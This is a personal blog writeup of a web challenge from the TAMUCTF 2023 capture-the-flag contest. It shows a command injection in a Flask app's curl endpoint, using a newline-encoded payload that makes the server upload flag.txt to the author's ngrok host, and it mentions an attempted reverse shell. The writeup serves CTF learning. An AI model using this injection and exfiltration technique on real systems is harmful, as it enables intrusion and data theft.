Site cover image

Site icon image vicevirus’ Blog

Yo, welcome to my blog! I write tech stuff and play CTFs for fun. (still a noob)

2023-05-05
CTF Cybersecurity 2023 TAMUCTF

Post title icon TAMUCTF 2023 Writeup

Introduction

TAMUctf is a CTF organized by the Texas A&M Cybersecurity Center.

I had the chance to participate in it last weekend. The challenges were tough, atleast for me.

But I was able to solve one web challenge.

Overall it was a fun and challenging experience.

Note : This writeup is written after the CTF website have been shut down. I’ll be writing on how I worked on the vulnerability with my local machine.

Web Category

Connect
  1. We were given a website where we could curl or test a connection to another website and spit out the httpresponse.
  2. We were also given a zip file which contains the source code of the website. 
    Image in a image block
  3. Now, lets inspect the app.py and see how it operates on the inside. App.py Seems like a normal flask website serving HTML,CSS,JS and running curl then output it onto the website..
    Image in a image block
  4. But this part of the code seems vulnerable…
  5.  What the block of code above does is :When someone sends a POST request to the /api/curl/ endpoint, it will run the command curl directly and returns the HTTP response.
Image in a image block
  1. The command ‘curl -s -D - -o /dev/null " + url + " | grep -oP '^HTTP.+[0-9]{3}'’ seems susceptible to command injection. Lets test it!
  2. Fire up Burp Suite and lets test the endpoint by first using ‘%0A’ to try and skip the command to newline and execute our custom commands. For this instance I’ll be using curl google.com as my custom command.
    Image in a image block
  3. As you can see below, the command curl google.com I put in just now got through onto my local environment terminal. Seems like a successful command injection. My curl command got through
    Image in a image block
  4. With the successful command injecton, the first thing I did was to setup a reverse shell. But turns out it didn’t work. I was never able to connect to the vulnerable server.
  5. Next, what I did was setup ngrok, so that the vulnerable server can curl and send a request to my ngrok server with the file contents. Ngrok set up
    Image in a image block
  6. Also, set up a listener on port 4444 to listen for any HTTP requests. 
    Image in a image block
  7. Now we send our own custom curl command.%0Acurl -F "file=@flag.txt" https://b063-113-211-210-189.ngrok-free.appThe F flag will include the local file into the HTTP request. Forcing the vulnerable server to curl to our ngrok server
    Image in a image block
  8. and we got the flag on the listener! 
    Image in a image block

Thanks for reading my writeup!

CTF Cybersecurity 2023 TAMUCTF